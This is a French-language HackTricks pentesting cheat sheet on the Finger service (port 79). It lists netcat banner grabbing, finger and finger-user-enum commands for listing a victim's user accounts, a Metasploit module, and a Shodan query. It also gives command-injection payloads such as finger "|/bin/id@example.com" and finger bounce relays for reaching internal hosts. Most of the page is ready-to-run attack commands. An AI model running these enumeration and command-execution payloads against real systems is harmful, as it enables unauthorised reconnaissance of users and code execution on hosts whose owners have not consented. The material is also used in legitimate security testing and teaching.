4.1 KiB
79 - Pentesting Finger
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert en équipe rouge AWS de HackTricks)!
Autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud github repos.
Informations de base
Le programme/service Finger est utilisé pour récupérer des détails sur les utilisateurs d'ordinateurs. En général, les informations fournies incluent le nom d'utilisateur, le nom complet de l'utilisateur et, dans certains cas, des détails supplémentaires. Ces détails supplémentaires pourraient inclure l'emplacement du bureau et le numéro de téléphone (si disponible), l'heure à laquelle l'utilisateur s'est connecté, la période d'inactivité (temps d'inactivité), la dernière fois que l'utilisateur a lu ses e-mails, et le contenu des fichiers de plan et de projet de l'utilisateur.
Port par défaut : 79
PORT STATE SERVICE
79/tcp open finger
Énumération
Récupération de bannière/Connexion de base
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
Énumération des utilisateurs
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
Alternatively you can use finger-user-enum from pentestmonkey, quelques exemples:
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
Nmap exécute un script pour utiliser les scripts par défaut
Metasploit utilise plus de techniques que Nmap
use auxiliary/scanner/finger/finger_users
Shodan
port:79 USER
Exécution de commandes
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
Rebond de doigt
Utilisez un système comme relais de doigt
finger user@host@victim
finger @internal@external
Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!
D'autres façons de soutenir HackTricks :
- Si vous souhaitez voir votre entreprise annoncée dans HackTricks ou télécharger HackTricks en PDF, consultez les PLANS D'ABONNEMENT !
- Obtenez le swag officiel PEASS & HackTricks
- Découvrez La famille PEASS, notre collection exclusive de NFTs
- Rejoignez le 💬 groupe Discord ou le groupe Telegram ou suivez-nous sur Twitter 🐦 @carlospolopm.
- Partagez vos astuces de piratage en soumettant des PR aux HackTricks et HackTricks Cloud dépôts GitHub.